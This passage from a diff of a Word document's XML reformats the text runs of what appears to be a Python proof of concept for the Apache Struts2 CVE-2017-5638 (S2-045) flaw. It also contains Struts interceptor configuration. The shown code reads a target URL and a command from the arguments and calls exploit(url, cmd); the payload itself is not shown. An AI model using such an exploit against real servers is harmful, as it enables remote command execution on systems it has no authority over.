+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'[*] CVE: 2017-5638 - Apache Struts2 S2-045')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> =</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4566,31 +5253,61 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>sys.argv[1]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        cmd =</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys.argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> =</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4600,31 +5317,79 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>sys.argv[2]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        print("[*] cmd: %s\n"</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys.argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"[*] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>: %s\n"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4650,31 +5415,87 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>cmd)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        exploit(url, cmd)</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>exploit(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4747,7 +5568,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>    &lt;interceptor-stack name="defaultWithoutUpload"&gt;</w:t>
+        <w:t>    &lt;interceptor-stack name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>defaultWithoutUpload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4801,7 +5640,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>        &lt;interceptor-ref name="servletConfig"/&gt;</w:t>
+        <w:t>        &lt;interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>servletConfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4873,25 +5730,61 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>        &lt;interceptor-ref name="scopedModelDriven"/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        &lt;interceptor-ref name="modelDriven"/&gt;</w:t>
+        <w:t>        &lt;interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>scopedModelDriven</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        &lt;interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>modelDriven</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4963,61 +5856,133 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>        &lt;interceptor-ref name="staticParams"/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        &lt;interceptor-ref name="actionMappingParams"/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        &lt;interceptor-ref name="params"/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        &lt;interceptor-ref name="conversionError"/&gt;</w:t>
+        <w:t>        &lt;interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>staticParams</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        &lt;interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>actionMappingParams</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        &lt;interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>params</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        &lt;interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>conversionError</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5053,7 +6018,89 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>            &lt;param name="excludeMethods"&gt;input,back,cancel,browse&lt;/param&gt;</w:t>
+        <w:t>            &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>param</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>excludeMethods</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>input,back</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>,cancel,browse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>param</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5107,7 +6154,89 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>            &lt;param name="excludeMethods"&gt;input,back,cancel,browse&lt;/param&gt;</w:t>
+        <w:t>            &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>param</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> name="</w:t>
+      </w:r>
